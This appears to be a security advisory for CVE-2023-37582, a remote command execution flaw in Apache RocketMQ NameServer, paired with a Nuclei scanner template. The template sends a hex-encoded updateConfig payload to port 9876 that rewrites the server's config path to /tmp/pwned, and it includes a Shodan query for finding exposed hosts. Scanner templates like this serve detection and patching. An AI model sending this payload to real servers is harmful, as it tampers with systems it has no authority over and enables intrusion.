The RocketMQ NameServer component still has a remote command execution vulnerability as the CVE-2023-33246 issue was not completely fixed in version 5.1.1. When NameServer address are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function on the NameServer component to execute commands as the system users that RocketMQ is running as. It is recommended for users to upgrade their NameServer version to 5.1.2 or above for RocketMQ 5.x or 4.9.7 or above for RocketMQ 4.x to prevent these attacks.
PoC代码[已公开]
id: CVE-2023-37582
info:
name: Apache RocketMQ - Remote Command Execution
author: daffainfo
severity: critical
description: |
The RocketMQ NameServer component still has a remote command execution vulnerability as the CVE-2023-33246 issue was not completely fixed in version 5.1.1. When NameServer address are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function on the NameServer component to execute commands as the system users that RocketMQ is running as. It is recommended for users to upgrade their NameServer version to 5.1.2 or above for RocketMQ 5.x or 4.9.7 or above for RocketMQ 4.x to prevent these attacks.
impact: |
Attackers can execute arbitrary commands on the system, potentially leading to full system compromise.
remediation: |
Upgrade RocketMQ to version 5.1.2 or above for 5.x series, or 4.9.7 or above for 4.x series.
reference:
- http://www.openwall.com/lists/oss-security/2023/07/12/1
- https://lists.apache.org/thread/m614czxtpvlztd7mfgcs2xcsg36rdbnc
- https://github.com/Malayke/CVE-2023-37582_EXPLOIT
- https://nvd.nist.gov/vuln/detail/CVE-2023-37582
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-37582
cwe-id: CWE-94
epss-score: 0.94201
epss-percentile: 0.99915
cpe: cpe:2.3:a:apache:rocketmq:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: apache
product: rocketmq
shodan-query: rocketmq port:"9876"
tags: cve,cve2023,apache,rocketmq,network,intrusive,vkev,vuln
tcp:
- inputs:
- data: 000000a4000000617b22636f6465223a3331382c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3430357d636f6e66696753746f7265506174683d2f746d702f70776e65640a70726f64756374456e764e616d653d746573742f706174685c6e746573745c6e74657374
type: hex
host:
- "{{Hostname}}"
port: 9876
read-size: 1024
matchers:
- type: dsl
dsl:
- "contains_all(raw, 'serializeTypeCurrentRPC', 'version')"
- "!contains_any(raw, 'Can not update config','FORBID ACCESS')"
condition: and
# digest: 4b0a00483046022100f3a3c3942e63a567e8a28c3ff2abb4ce10ab5e6e5d3d6cfbc130540d3d7463fa022100e1df21bc56cf574c33bdebed187c66b34dd1fc24b208b7c681b3bdf4055a894d:922c64590222798bb761d5b6d8e72950